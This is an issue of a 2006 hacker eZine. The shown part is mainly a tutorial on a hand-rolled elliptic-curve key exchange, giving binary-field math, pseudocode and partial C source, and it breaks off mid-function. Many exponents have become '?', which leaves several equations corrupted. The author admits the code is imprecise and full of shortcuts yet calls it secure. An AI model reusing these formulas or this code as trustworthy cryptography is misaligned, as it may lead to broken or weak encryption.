Copy Link
Add to Bookmark
Report

Aware eZine 01 - Alpha

eZine's profile picture
Published in 
aware eZine
 · 4 years ago

  

.aware eZine Alpha - Overground Hacking

Too much technology, in too little time.

_..gggggppppp.._
_.go101110000010111010op._
.g1101100101000011010101001001p.
.g1011001101100000100001100110101100p.
.o10111001100101111101010111001110101110o.
.o010011100101110000101111011010000100001100o.
o0001101001100001101101000101100001010011100110o
o111010110010111110000000001101101111110111011101o
o11010100000110001000000101111000011010110010110001o
o0010110011010000000010000100010011011000001110000111o
o011110101101100000110100101010001001100110101101101100o
:10011111001001010001101010110100010011111100010001011000;
1000101111010111001111001110000111010100101111101101100111
:0000110100101111101001101001011110111101010111001100000101;
111011111000000101111101001111001101000110101011011001011001
:111000100111010000111100010000110111011001110101011110000100;
:101111001100100011000001111110110100101101110101101010111010;
10101011000000000111000001111111011100001110100101110010000101
11001001101010100001010110111101101011011110110011111010111011
:101001010101101111000010100010011P"' "Q111100011100101011;
:001001001101010111001110010010101Y Y01010011110111010;
110001111000110100100110010100110 01010100110000111
:00010110000101111010100101010011. .0011110001011001;
10111110011000011111001001110101O O1010111110001000
:11000001100011011011011100000000o,_ _,o0010011100110010;
T110101001110010000110110111000001010000000100011000010P
T0110011000101011101011101000000101111111111001001000P
T00110111111001010010011101110110110001110001101111P
T111001010010111111010101001111000011101111000101P
T1110000110010100101111001111101011000000101011P
`T100100101011001110111100001101011000100011P'
`T11111001011011000110000011100101010111P'
"^1111011011111101010101011101111000^"
"^T01001111111100111100001000P^"
'""^^^T0011101011T^^^""'



Hello and welcome to the first .aware eZine ever to exist on planet
earth. Basically, with all the h0no wannabes out there and phrack down,
I thought there ought to be a little bit more actual infotainment spread
into cyperspace. This way, maybe not all of us will be driven into
criminal insanity by paranoid hallucinations.


Enjoy the zine.

PS: We're sorry for causing all that cancer.


1 ECDLP Quick & Dirty rattle
2 Breaking Perl zshzn
3 Exploring RDA kharn
4 The House of Mind K-sPecial
5 Adjacent memory overflows Nomenumbra
6 outr0 rattle

[=========================================================================]
[-------------------------[ ECDLP Quick & Dirty ]-------------------------]
[=========================================================================]


_==####==_
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/?_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########*?*######
*#########{ }####*
##########._.#####
################ (C) 2006 by .aware computer security research group
*############*
?==####==? Web: http://awarenetwork.org
Author: rattle@awarenetwork.org



------------------------------------------------[ Table of Contents ]-----

i. Abstract
ii. Preface
iii. Mathematical Background
iv. Implementation Issues - Fields
v. Implementation Issues - Curves
vi. Implementation
vii. Conclusion
viii. References


-[ i ]----------------------------------------------------[ Abstract ]-----


We aim to implement a very small and versatile assymetric key exchange
algorithm for x86 platforms, based on the Elliptic Curve Discrete
Logarithm Problem (ECDLP). This algorithm allows 2 parties to exchange a
key of sufficient length for subsequently encrypting traffic with a
symmetric cipher.

NOTE: This paper might offend the mathematically schooled among you
because I was not exactly precise, let alone thorough.


-[ ii ]----------------------------------------------------[ Preface ]-----


"I encrypt all my data with one-time pad's that consist
of an electrometre measuring me urinating into the
toilet. I'm secure."

- sirukin


It has come to my attention that modern cryptography, while being on
everyone's favourite feature list, is hardly found explained in papers
with the due clarity it requires. More accurately, most articles give
you a rough idea of how certain cryptographic schemes work and,
succeed in completely failing to give you enough insight (or tools) to
implement an actually secure, working algorithm. In particular, I am
referring to Elliptic Curve Cryptography (ECC), which I will be
revolving around for the rest of the night.

If everyone has such a compulsive thirst for knowledge - why the utter
lack of enlightenment? Pretty simple. Just like the less sophisticated
asymmetric schemes (like RSA), the basic idea of ECC can be wrapped up
in a couple of fancy sketches and some first semester algebra. However,
once you delve deeper into the topic, you will find that it is
headblowingly complicated and not nearly as easy as they told you.

Don't be intimidated, though. I will work around most problems of ECC
with dirty tricks and hardcoded parameters. What we will get, though,
is a working and secure ECDLP key exchange algorithm implemented in C
for x86 machines. Mac users, rejoice.



-[ iii ]-----------------------------------[ Mathematical Background ]-----


"Well, just because you don't understand it, does not
mean it's complicated."

- My Algebra Professor


(1) Fields. A field is a mathematical structure F which behaves similar to
the real or the rational numbers. For in time, I recommend you think of
these structures as we analyze them in a more abstract fashion. Elements
of a field can be added and multiplied. Each element a has a uniquely
defined additive inverse (-a) such that a+(-a)=0. Also, each element a!=0
has a multiplicative inverse (1/a) such that a * (1/a) = 1. Also, you have
a*b=b*a, a*(b*c)=(a*b)*c and (a+b)*c = ac+bc. All this is obvious for real
or rational numbers - but there are much more interesting structures that
obey the same laws. As you might have already concluded, each field
contains the Elements 0 and 1, the neutral Elements of Addition and
Multiplication respectively. (Neutral because a+0=a, a*1=a.)

Well, since it seems to be the smallest possible one, how about the field
F2 = { 0, 1 } with


Addition: Multiplication:

+ | 0 | 1 * | 0 | 1
---+---+--- ---+---+---
0 | 0 | 1 0 | 0 | 0
---+---+--- ---+---+---
1 | 1 | 0 1 | 0 | 1
' ' ' '

The addition is a simple XOR operation, the multiplication works just
as though 1 and 0 were integer numbers. This means, you use + and * on
0 and 1 as though they were integer numbers, but the result of your
operation is the parity of the calculated number. Since there aren't that
many scenarios, you can easily convince yourself that you can operate
inside F2 just like you can operate on real and rational numbers.

While it's an interesting and entertaining example, let's try to
generalize the concept. For any prime p, let F(p) = { 0, 1, ..., p-1 } be
the field where every operation is performed modulo p. This means, for
any a,b in F(p), you have

add(a,b) := (a + b) % p
mul(a,b) := (a * b) % p

It can be shown that the resulting structure is a field. Why primes? I
will not go into detail here, but p being a prime is necessary for the
existence of a multiplicative inverse for every a != 0. For instance, if
we'd try p = 6, you had mul(2,3) = (2*3)%6 = 0, and consequentially,
neither 2 or 3 would have a multiplicative inverse. However, for p=7:

mul(1,1) = 1 % 7 = 1
mul(2,4) = (2 * 4) % 7 = 8 % 7 = 1
mul(3,5) = (3 * 5) % 7 = 15 % 7 = 1
mul(6,6) = (6 * 6) % 7 = 36 % 7 = 1

These fields are known as prime fields. It can be shown that every finite
field (a field with finitely many elements) has p to the power of m
elements, where p is a prime and m a positive integer number. We have
covered the fields with p elements already, what do the others look like?

Consider polynomials with coefficients in F(p). As you might know,
polynomials can be added and multiplied. Most axioms of a field are
already given, but we are lacking a multiplicative inverse for every
polynomial of degree 1 or more. In fact, the polynomials over F(p)
are, as a structure, very similar to the integer numbers - there's a
polynomial division with rest, just like you have a division with rest for
integers. Accordingly, you will also find prime polynomials. You will
have to believe me when I tell you the following two things (or read a big
book on algebra):

- For any m, there exists a prime polynomial of degree m over F(p).
- Performing every operation in F(p) modulo a prime polynomial of
degree m yields a field structure with p to the power of m
elements.

We are particularly excited about polynomials over F2, because they can
easily be represented as a bitstring (the coefficients of the
polynomial are either 1 or 0). We will refer to this structure as F(2,m)
where (m+1) is the degree of the prime polynomial we use for reduction.

I cannot venture too deep into the maths here. For now, I just want
you to know and trust me that F(2,m) works just like real or rational
numbers - except for nasty things like a + a = (1 + 1) * a = 0 * a = 0.


(2) Elliptic curves. What is an elliptic curve? An elliptic curve, for
us, will be the set of all points (x,y) from any field which satisfy an
equation of the form


y? + xy = x? + ax? + b (*)


Note that this is not the general definition of an elliptic curve. Indeed,
this is a "non-supersingular" curve. However, frankly, that's all we are
interested in.
We will write, for given coefficients a and b:


E(F) = { (x,y) : x in F, y in F, y? + xy = x? + ax? + b } + { @ }


In words: E(F) is the set of all tuples (x,y) with x and y in F, such that
x and y satisfy the curve equation (*). We also say that x=infinity and
y=infinity satisfy the curve equation and call the point @ the "point at
infinity"
.

The sketch below shows how these kinds of curves look over the real
numbers:


| .
|
| .
| .
| .
|.
. . . .|
. . .. . |
. |
. |
----------------------+-----------------
. |
. |
. . .. . |
. . . .|
|.
| .
| .
| .
|
| .


There is something particularly interesting about these elliptic curves.
Provided that P and Q are points on the curve, draw a line through P and
Q. It will intersect the curve in a third point R'. The sum of
P and Q is then defined as the negative of R', which is simply the
reflection of R' about the x-axis. To add a point P to itself, you draw
the tangent instead.



| /
| .
| /. R'
| /
| / .
| /
| / .
|/
/ .
/| .
/ | .
/ |.
. . . / .|
. . .. . |
. / Q |
. / |
--------------/-------+-----------------
. / |
. / |
. / . .. . |
. . . .|
/ P |.
/ | .
/ | .
/ | .
/ |
/ | .
/ |
/ | .
/ |
/ | .
/ | X -R' = (P + Q)




To be precise, for P = (x,y) we set -P = (x,-y). Set P + (-P) := @.

As an interesting result, E(F) together with this addition law is an
abelian group (that means, adding these points technically works like
like adding integer numbers) with @ serving as the neutral element
(the "zero").

How can we put this structure to cryptographic use? First of all, we
consider elliptic curves over finite fields. Also, define a function


f(n,P) = nP = P + P + ... + P

<-- n times -->


For very large n, this function is still easy to calculate for a given
point P. However - given Q and P, it is very hard to find an integer
Number n such that Q = f(n,P). This is called the Elliptic Curve Discrete
Logarithm Problem. Now, due to the abelian structure, you have


f(n*m,P) = f(n,f(m,P)) = f(m,f(n,P))


for any two integers n and m. Let me show you how we can exchange keys
with this little trick.


(1) Alice and Bob agree on a Point P in E(F).
(2) Alice secretly chooses a big random number n and calculates nP.
Bob also chooses big random number m and calculates mP.
(3) Alice sends Bob (nP), Bob sends Alice (mP).
(4) Alice calculates n(mP) = nmP =: Q.
Bob also calculates m(nP) = nmP = Q.
(5) Bob and Alice use Q as the key for encrypting traffic.


What does Eve know? She knows P, (nP) and (mP). To get Q, she'd need the
product nm. However, this would only be possible by solving the ECDLP for
(nP) and (mP) (or solving a similarly hard problem).

And that's that, folks. Let's get down to business!



-[ iv ]-----------------------------[ Implementation Issues - Fields ]-----


"If I recally correctly, the compiler does issue optimizer notes for
this, it's just that they don't particularly stand out from the other
notes so you might not realize that these particular optimization
notes are OPTIMIZATION PROBLEMS WHICH WILL BURN ALL YOUR CPU CYCLES
IN THE DEEPEST PITS OF COMPUTATIONAL HELL."


- William Newman on run-time casting with SBCL (#lisp 2003/03/29)



First of all, the ECDLP is hard only if the two following rather strong
conditions are met:


- The number of elements in your finite Field is larger than at least
2 to the power of 128. 256 bits is better, 512 scares the NSA.
- The number of points on your elliptic curve is almost prime, which
means that it is of the form |E(F)| = h * p, where p is prime and
h very small.


This leads to the following problems:


(A) Implement sufficiently fast finite field arithmetics for fields
with approximately 1.34e+154 elements (that's around 512 bits).

(B) Find a curve which has appropriate order.


Problem (A) is our biggest problem, as (B) has been solved by government
agencies and smart mathematicians around the world. So we're left with
the task of implementing F(2,m) for m ~= 512.

Polynomials will be implemented as bitstrings of length m, stored in a
little endian array of T = (m/32) machine words (32 bits).


(1) Shifting / Multiplication with x. Because we store polynomials as
bitstrings, shifting is a cheap linear operation. Only consider shifts
of l<32 (for shifts larger than our wordsize of 32, we can shift
word-wise first in linear time). We now have to shift and rotate through
the carry bit at most 31*(m/32) ~ m times.


(2) Addition. Adding two polynomials in F(2,m) is trivially linear.
It is implemented as T XOR operations.


(3) Multiplication. Multiplication might seem more complicated, but is
easily implemented in O(m?). It works like this:

--------------------------------------------------------------
Bitwise Comb Polynomial Multiplication Algorithm
--------------------------------------------------------------

Input: Polynomials p(x), q(x) as bitstrings
Output: c(x) = p(x) * q(x)

SET c(x) = 0
FOR i=0 TO m DO:
IF bit i of p(x) is set:
c(x) := c(x) + (q(x) << i)
RETURN c(x)

--------------------------------------------------------------

You can achieve better complexity with a divide-and-conquer approach as
explained in [K1]. However - for m as small as approximately 512 bit,
benchmarks for bitwise comb turn out to be faster than benchmarks for
divide&conquer, on several systems. Thus, for our purposes, the
algorithm is completely sufficient, if not optimal.


(4) Squaring. Calculating p(x)? can be implemented as a very fast
linear operation due to the following observation which only
applies to fields where 1+1=0:

(a + b + c)? = (a + b + c) (a + b + c)
= a? + ab + ac + ba + b? + bc + ca + cb + c?
= a? + b? + c? + (1+1)ab + (1+1)ac + (1+1)bc
= a? + b? + c?

Thus, given a polynomial p(x) as bitstring, we can calculate p(x)? by
simply inserting zeros between all bits. For instance,

(1100111)? = (1010000010101)

With a wee bit of precomputation, this is easily done in 4T = m/8
steps.


(5) Reduction. The algorithms for squaring and multiplication yield
polynomials of degree > m. These polynomials need to be reduced modulo
a prime polynomial f(x) of degree m+1. For now, assume we have such an
algorithm.


(6) Inversion. Last, but definitely not least, we need a "division"
algorithm. This means, for a given polynomial p(x), find the (uniquely
defined) multiplicative inverse polynomial q(x), such that:

p(x) * q(x) = 1 mod f(x)

where f(x) is our reduction polynomial. To find the Inverse, we use
the polynomial version of euclid's extended algorithm:

--------------------------------------------------------------
Euclid's Extended Algorithm (Polynomial)
--------------------------------------------------------------

Input: Polynomials p(x) and f(x)
Output: Polynomials a(x),b(x) and d(x) such that
a(x) * p(x) + b(x) * f(x) = d(x)

SET a(x) = 1, a?(x) = 0,
b(x) = 0, b?(x) = 1
SET u(x) = p(x),
d(x) = f(x)

WHILE u(x) != 0 DO:
SET j := deg(u(x)) - deg(v(x))
IF j < 0:
u <-> d
a <-> a?
b <-> b?
j := -j
u(x) := u(x) + ( d(x)<<j)
a(x) := a(x) + (a?(x)<<j)
b(x) := b(x) + (b?(x)<<j)

RETURN a(x),b(x),d(x)

--------------------------------------------------------------

where "a <-> b" means "exchange a and b".

In this particular case, we always have d(x) = 1 because f(x) is prime,
and we don't care about b(x).


The only thing that is left to be done is reduction. This is the only
algorithm that depends on the form of the reduction polynomial f(x).
This is also the only algorithm that requires a lot of work and
hand-tuned optimization. You can skip the rest of this chapter if you
are not interested in this kind of stuff.

We will now try to find a reduction polynomial of degree > 512 which
is particularly suited for reduction.

On the other hand, why try to find one if one has already been found?
The [F1] standard suggests reduction modulo the pentanomial

--------------------------------------------------------------
Pentanomial f571(x)
--------------------------------------------------------------

f(x) = x**571 + x**10 + x**5 + x**2 + 1

~ (1<<571) + (1<<10) + (1<<5) + (1<<2) + 1

= 0x 08000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000425

--------------------------------------------------------------


Write f(x) = h(x) + r(x). where h(x)= (1<<571). Also assume we have a
polynomial p(x) of degree at most 2m = 1140. Write

p(x) = b(x)*h(x) + a(x).

with polynomials b(x),a(x) of degree m. Because

b(x)h(x) = b(x)f(x) + b(x)r(x)

We get that b(x)h(x) = b(x)r(x) mod f(x), thus we have

p(x) = b(x)r(x) + a(x) mod f(x).


Now we're getting down to the hard part. We need to devise a fast
reduction algorithm. Assume that the bitstring of P is stored as an array
of unsigned little endian machine words


p(x) = P[2T], P[2T-1], ..., P[T], P[T-1], ..., P[0]


In this case, our polynomial b(x) starts at bitoffset 26 of P[T-1],
because we assume a(x) to be a 570 bit polynomial which does not need to
be reduced. Consider:


<---- P[2T] ---> <--- P[T] ---> <------------ P[T-1] --------------->

{1151} .. {1120} ... {608} .. {576} {575}{574}{573}{572}{571} {570} .....

<---------------------------- B ----------------------------> <--- A --->


This means we have to understand B[i] == (P[i+T]<<5) ^ (P[i+T-1]>>27).
Also, obviously A[i] == P[i].


Now, let's forget this for a while and think about how b(x)r(x) is
calculated. We have r(x) = (1<<10)+(1<<5)+(1<<2)+1 = 0x425. We get

B[i]*R = B[i] ^ (B[i] << 10) ^ (B[i] << 5) ^ (B[i] << 2)

and a (maximum 10-bit) carry:

C(B,i) := (B[i] >> 22) ^ (B[i] >> 27) ^ (B[i] >> 30)

Thus, in one step of our algorithm, we will have to do

-------------------------------------------------------------------------

FOR i = 1, ..., T-1 DO

P[i] := A[i] ^ B[i] ^ (B[i] << 10) ^ (B[i] << 5) ^ (B[i] << 2)
P[i+1] := A[i+1] ^ C(B,i)

-------------------------------------------------------------------------

Consider what we had before and we get

P[i]
= ((P[i+T]<<5) ^ (P[i+T-1]>>27)) ^
( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) << 5 ) ^
( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) << 2 ) ^
( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) << 10 ) ^ P[i]

= P[i] ^ (P[i+T]<<5) ^ (P[i+T]<<7) ^ (P[i+T]<<10) ^ (P[i+T]<<15)

^ (P[i+T-1]>>27) ^ (P[i+T-1]>>27)<<2
^ (P[i+T-1]>>27)<<5 ^ (P[i+T-1]>>27)<<10 (*)


P[i+1]
=
( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) >> 22) ^
( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) >> 27) ^
( ((P[i+T]<<5) ^ (P[i+T-1]>>27)) >> 30) ^ P[i+1]

= P[i+1] ^ (P[i+T]<<5)>>22 ^ (P[i+T]<<5)>>27 ^ (P[i+T]<<5)>>30


however, one step later, P[i+1] will be XOR'd with (*). We have,
if we look at a bitwise representation of X:

Bits, numbered from A to 6: Variable: Label:

ABCDEFGHIJKLMNOPQRSTUVWXYZ123456 (X)
^ 0000000000000000000000ABCDE00000 (X>>27)<<5 (A1)
^ 000000000000000000000000000FGHIJ (X<<5)>>27 (A2)
^ 0000000000000000000000FGHIJKLMNO (X<<5)>>22 (B1)
^ 000000000000000000000000000000FG (X<<5)>>30 (C1)
^ 000000000000000000000000000ABCDE (X>>27) (D)
^ 0000000000000000000000000ABCDE00 (X>>27)<<2 (C2)
^ 00000000000000000ABCDE0000000000 (X>>27)<<10 (B2)

/\ /\ /\
|| || ||
\/ \/ \/

ABCDEFGHIJKLMNOPQRSTUVWXYZ123456 (X)
^ 0000000000000000000000ABCDEFGHIJ (X>>22) (A) = (A1)^(A2)
^ 000000000000000000000000000ABCDE (X>>27) (D)
^ 0000000000000000000000000ABCDEFG (X>>25) (C) = (C1)^(C2)
^ 00000000000000000ABCDEFGHIJKLMNO (X>>17) (B) = (B1)^(B2)


Hence, we can rewrite our Algorithm to:

-------------------------------------------------------------------------

FOR i = T-1, ..., 0 DO
SET X := P[i+T]
P[i] := P[i] ^ (X<<5) ^ (X<<7) ^ (X<<10) ^ (X<<15)
P[i+1] := P[i+1] ^ (X>>17) ^ (X>>22) ^ (X>>25) ^ (X>>27)

-------------------------------------------------------------------------


The Polynomial we get after reduction will, of course, still have degree
> 570. However, since deg(C(B,T)) <= 10 and deg(r(x)) <= 10, we have
deg(C(B,T)r(x)) <= 20, which fits into one single machine word. Hence, we
should be able to complete the reduction with one more operation (and a
few shifts). Without proof I will tell you that we can complete the
reduction algorithm to:

-------------------------------------------------------------------------
Polynomial Reduction Algorithm Modulo f571
-------------------------------------------------------------------------

Input: Polynomial p(x) of degree 1140 or less, stored as
an array of 2T machinewords.
Output: p(x) mod f571(x)

FOR i = T-1, ..., 0 DO
SET X := P[i+T]
P[i] := P[i] ^ (X<<5) ^ (X<<7) ^ (X<<10) ^ (X<<15)
P[i+1] := P[i+1] ^ (X>>17) ^ (X>>22) ^ (X>>25) ^ (X>>27)

SET X := P[T-1] >> 27
P[0] := P[0] ^ X ^ (X<<2) ^ (X<<5) ^ (X<<10)
P[T-1] := P[T-1] & 0x07ffffff

RETURN P[T-1],...,P[0]

-------------------------------------------------------------------------

We're done! We have each and every function to implement a fast 570 bit
binary field.




-[ iv ]-----------------------------[ Implementation Issues - Curves ]-----


"Premature Optimization is the root of all evil."
- Tony Hoare


Now that we have a field to work with, we need to sort out some final
issues with the curve implementation. As I told you before, the ECDLP is
hard only if the curve does not have a smooth order. At this point we
shortcut a huge problem of elliptic curve cryptography by choosing a
hardcoded (Koblitz) curve over F(2,570) which has almost prime order.
That curve is


E0: y? + xy = x? + 1


This is a non-supersingular Koblitz curve over F2. Fancy words, huh? The
laws for point addition work as follows:


1. P + @ = @ + P = P for all P in E(F(2,m))

2. The negative of P = (x,y) is -P = (x, x + y). Also, -@ = @ and
of course, P + (-P) = @.

3. Point addition: Let P=(x1,y1) and Q=(x2,y2), where P is neither Q nor
-Q. Then we have P + Q = (x3,y3), where


x3 = l? + l + x1 + x2 (y1 + y2)
with l := ---------
y3 = l(x1+x3) + x3 + y1 (x1 + x2)


4. Point doubling. Let P = (x, y) and P is not -P. Then we will write
P+P = 2P = (a, b), where


a = l? + l = x? + (1/x?) (x + y)
with l := -------
b = l(x+a) + a + y x



But wait! You said in (iii.) that -(x,y) = (x,-y)! Yea. I lied. That law
in (iii) is not the law for non-supersingular curves over F2, but for
curves over the real numbers. You see, in F(2,570), many things are very
different from other fields because we have 1+1=0. Simple things like
dividing by 2 turn out to be real explosive. Hence, most algorithms and
laws have to be tweaked a bit.

Know that Koblitz curves have special traits which gave birth to a lot of
literally insane optimization algorithms. Also know that I did not
implement any of these. It might be a topic for later papers. Instead,
the above laws have been implemented naively. What requires a wee bit of
attention is the point multiplication algorithm. First of all, point
multiplication is defined as the n-fold addition of a point P. Here, n
is any integer number. We will use a standard square & multiply (double
& add) algorithm to implement the point multiplication using point
addition. Hence, we will view the integer number as a bitstring and
consequentially, we can use the same data type for 576-bit polynomials and
576-bit integer numbers.

---------------------------------------------------------
Double & Add Point Multiplication Algorithm
---------------------------------------------------------

Input: Point P, Polynomial k(x) over Z
Output: k(2)*P

SET Q := P

FOR i = deg(k), ..., 0 DO:
Q := Q+Q
IF bit i of k(x) is set THEN:
Q := Q+P

RETURN Q

---------------------------------------------------------

Our work here is almost done. The only remaining problem is - how do we
find a point on the curve? (1,1) and (1,0) are trivial solutions, but
they are of such small order that they are not really suitable for key
exchange via ECDLP. On the other hand, |E(F)| ~= q, where q = |F| (there
are approximately as many points on the curve as there are elements in
the underlying field). Since we have q? possible point combinations, we
have a probability of 1/q ~= 2.59e-172 that a random point actually
satisfies the curve equation.

We will work around this problem the same way we worked around most
problems so far - we won't solve it. The following point is, according to
[F1], a generator point of the koblitz curve we chose in little Endian
notation:

PGEN = {
0xA01C8972,0xE2945283,0x4DCA88C7,0x988B4717,0x494776FB,0xBBD1BA39,
0xB4CEB08C,0x47DA304D,0x93B205E6,0x43709584,0x01841CA4,0x60248048,
0x0012D5D4,0xAC9CA297,0xF8103FE4,0x82189631,0x59923FBC,0x026EB7A8,

0x3EF1C7A3,0x01CD4C14,0x591984F6,0x320430C8,0x7BA7AF1B,0xB620B01A,
0xF772AEDC,0x4FBEBBB9,0xAC44AEA7,0x9D4979C0,0x006D8A2C,0xFFC61EFC,
0x9F307A54,0x4DD58CEC,0x3BCA9531,0x4F4AEADE,0x7F4FBF37,0x0349DC80 }

What is a generator point? A point P of E(F) is called a generator point
if and only if for every Q in E(F), there is an integer number n such
that nP = Q. In plain English, this point generates the entire curve.

In step (1) of the key exchange, explained in the last paragraph of
chapter (iii), we will always choose the point PGEN. Now, having cheated
our way around the more cumbersome problems of ECC, we shall have some
fun.




-[ vi ]---------------------------------------------[ Implementation ]-----


"I considered life, I implemented life, now, life is boring."
- thE AWKz


In the Appendix, you will find the following files:


binfields.h curve.h
binfields.c curve.c


The binfields module implements polynomial extension fields modulo the
prime polynomial presented in (iv). All operations are implemented as
described in (iv) and provide sufficiently fast arithmetics. The curve
module implements the koblitz curve E0 as described in (iv).

Note that the curve module has not been optimized for speed. I have
tested the Module, and for a full-blown key exchange, the algorithm takes
around 3-4 seconds, which means an effort of max. 2 seconds for each
party. This is reasonably fast and definitely fast enough for any
real life application. On a slow box, this might grow to time spans
of 10 seconds, but I still think it is within acceptable range.

Now, how does the Module work? Basically, include curve.h and then,
all you need are the following functions:

word* pointMul(word* R, word* k, word* P);
word* pointGen();
word* polyRand();


polyRand() generates a random polynomial in F(2,570). For the sake of
point Multiplication, it can also be interpreted as a 570-bit integer
number. pointGen() gives you a hardcoded generator point of E0.

For key exchange, each side performs the following operation (after
initializing the random number generator):

--------------------------------------------------------------

word* n = polyRand();
word* P = pointGen();

pointMul(P,n,P); // P := nP
sendToBob(P); // send (nP) to bob
recvFromBob(P); // get (mP) from bob
pointMul(P,n,P); // calculate Q = nmP = n(mP)
free(n);

/* use the 36-word array P or any substring of it
for symmetric encryption. */


--------------------------------------------------------------

And voila, you're good to go.




-[ vii ]------------------------------------------------[ Conclusion ]-----


"I know that you believe you understand what you
think I said, but I'm not sure you realize that
what you heard is not what I meant."

- Robert McCloskey


We have implemented exactly what we wanted - a quick and dirty ECDLP key
exchange algorithm. It is far from being a comprehensive and complete
ECC library - it is limited. On the other hand, it is small and easily
incorporated with applications you might already have. Any kind of remote
networking software can now be equipped with full-blown assymetric
encryption. I can imagine a whole lot of ways to put this option to good
use.

And now, enjoy the code.



-[ viii ]-----------------------------------------------[ References ]-----


[K1] Karatsuba - Ofman Multiplication using Divide & Conquer

http://mathworld.wolfram.com/KaratsubaMultiplication.html


[F1] Federal Information Processing Standards Publication
FIPS-186-2 - Digital Signature Standard

http://csrc.nist.gov/publications/fips/fips186-2/fips186-2-change1.pdf






[=========================================================================]
[------------------------------[ APPENDIX ]-------------------------------]
[=========================================================================]


All files have been compiled using Microsoft Visual Studio 6 on Windows.
Since there is a lot of inline Assembler, you might have to hand-tweak
this code for other platforms.



-------------------------------<binfields.h>-------------------------------


#ifndef _BINFIELDS__H
#define _BINFIELDS__H

typedef unsigned char byte;
typedef unsigned long word;

#define SIZE_BITS 0x0000023a
#define SIZE_WORDS 0x00000012
#define SIZE_BYTES 0x00000048
#define EMPTY_MASK 0x07ffffff
#define SIZE_BITS2 0x00000474
#define SIZE_WORDS2 0x00000024
#define SIZE_BYTES2 0x00000090

void __fastcall lshift(word* a, word n);
void __fastcall rshift(word* a, word n);

int deg(word *a);

int __fastcall polyCmp(word *a, word *b);
int __fastcall polyIsZero(word *a);

word* __fastcall polyAdd(word* c, word* a, word* b);
word* __fastcall polyAddTo(word* a, word* b);

word* polySqr(word* c, word* a);
word* polyMul(word* c, word *a, word *b);
word* polyDiv(word* c, word *a, word *b);
word* polyInv(word *c, word *a);


word* polyGen();
word* polyRand();
word* polyDup(word* a);

#endif


-------------------------------<binfields.c>-------------------------------


#include <memory.h>
#include <stdlib.h>
#include <math.h>
#include <time.h>
#include "binfields.h"

// Precomputed Array. For each byte a1,a2,...,a8, this
// array contains the halfword a1,0,a2,0,a3,0,...,0,a8.
// This is used for fast squaring.

const static unsigned short POW[0x100] = {
0x0000,0x0001,0x0004,0x0005,0x0010,0x0011,0x0014,0x0015,
0x0040,0x0041,0x0044,0x0045,0x0050,0x0051,0x0054,0x0055,
0x0100,0x0101,0x0104,0x0105,0x0110,0x0111,0x0114,0x0115,
0x0140,0x0141,0x0144,0x0145,0x0150,0x0151,0x0154,0x0155,
0x0400,0x0401,0x0404,0x0405,0x0410,0x0411,0x0414,0x0415,
0x0440,0x0441,0x0444,0x0445,0x0450,0x0451,0x0454,0x0455,
0x0500,0x0501,0x0504,0x0505,0x0510,0x0511,0x0514,0x0515,
0x0540,0x0541,0x0544,0x0545,0x0550,0x0551,0x0554,0x0555,
0x1000,0x1001,0x1004,0x1005,0x1010,0x1011,0x1014,0x1015,
0x1040,0x1041,0x1044,0x1045,0x1050,0x1051,0x1054,0x1055,
0x1100,0x1101,0x1104,0x1105,0x1110,0x1111,0x1114,0x1115,
0x1140,0x1141,0x1144,0x1145,0x1150,0x1151,0x1154,0x1155,
0x1400,0x1401,0x1404,0x1405,0x1410,0x1411,0x1414,0x1415,
0x1440,0x1441,0x1444,0x1445,0x1450,0x1451,0x1454,0x1455,
0x1500,0x1501,0x1504,0x1505,0x1510,0x1511,0x1514,0x1515,
0x1540,0x1541,0x1544,0x1545,0x1550,0x1551,0x1554,0x1555,
0x4000,0x4001,0x4004,0x4005,0x4010,0x4011,0x4014,0x4015,
0x4040,0x4041,0x4044,0x4045,0x4050,0x4051,0x4054,0x4055,
0x4100,0x4101,0x4104,0x4105,0x4110,0x4111,0x4114,0x4115,
0x4140,0x4141,0x4144,0x4145,0x4150,0x4151,0x4154,0x4155,
0x4400,0x4401,0x4404,0x4405,0x4410,0x4411,0x4414,0x4415,
0x4440,0x4441,0x4444,0x4445,0x4450,0x4451,0x4454,0x4455,
0x4500,0x4501,0x4504,0x4505,0x4510,0x4511,0x4514,0x4515,
0x4540,0x4541,0x4544,0x4545,0x4550,0x4551,0x4554,0x4555,
0x5000,0x5001,0x5004,0x5005,0x5010,0x5011,0x5014,0x5015,
0x5040,0x5041,0x5044,0x5045,0x5050,0x5051,0x5054,0x5055,
0x5100,0x5101,0x5104,0x5105,0x5110,0x5111,0x5114,0x5115,
0x5140,0x5141,0x5144,0x5145,0x5150,0x5151,0x5154,0x5155,
0x5400,0x5401,0x5404,0x5405,0x5410,0x5411,0x5414,0x5415,
0x5440,0x5441,0x5444,0x5445,0x5450,0x5451,0x5454,0x5455,
0x5500,0x5501,0x5504,0x5505,0x5510,0x5511,0x5514,0x5515,
0x5540,0x5541,0x5544,0x5545,0x5550,0x5551,0x5554,0x5555 };


void __fastcall lshift2(word* a, word n);


word* __fastcall __reduce(word* c, word* temp) {
register int i;
register word T;

if (!deg(&c[SIZE_WORDS]) && deg(c)<=SIZE_BITS)
goto __reduce_done;

for (i=SIZE_WORDS2-1;i>=SIZE_WORDS;i--) {
T = c[i];
c[i-SIZE_WORDS] ^= (T<<5) ^ (T<<7) ^ (T<<10) ^ (T<<15);
c[i-SIZE_WORDS+1] ^= (T>>27) ^ (T>>25) ^ (T>>22) ^ (T>>17);
}
T = c[SIZE_WORDS-1] >> 27;
c[0] = c[0] ^ T ^ (T<<2) ^ (T<<5) ^ (T<<10);
c[SIZE_WORDS-1] = c[SIZE_WORDS-1] & EMPTY_MASK;
__reduce_done:
return memcpy(temp, c, SIZE_BYTES);
}

word* polyMul(word* r, word* a, word* b) {
register int k,j;
word c[SIZE_WORDS2] = {0};

for (k=31;k>=0;k--) {
for (j=0;j<SIZE_WORDS;j++)
if ((a[j]>>k)&1)
polyAddTo(&c[j],b);
if (k) lshift2(c,1);
}

return __reduce(c,r);
}

word* polySqr(word* r, word *a) {
register word i;
word c[SIZE_WORDS2] = {0};
for (i=0;i<SIZE_WORDS;i++) {
c[2*i] = POW[(a[i]>>0x00) & 0xFF];
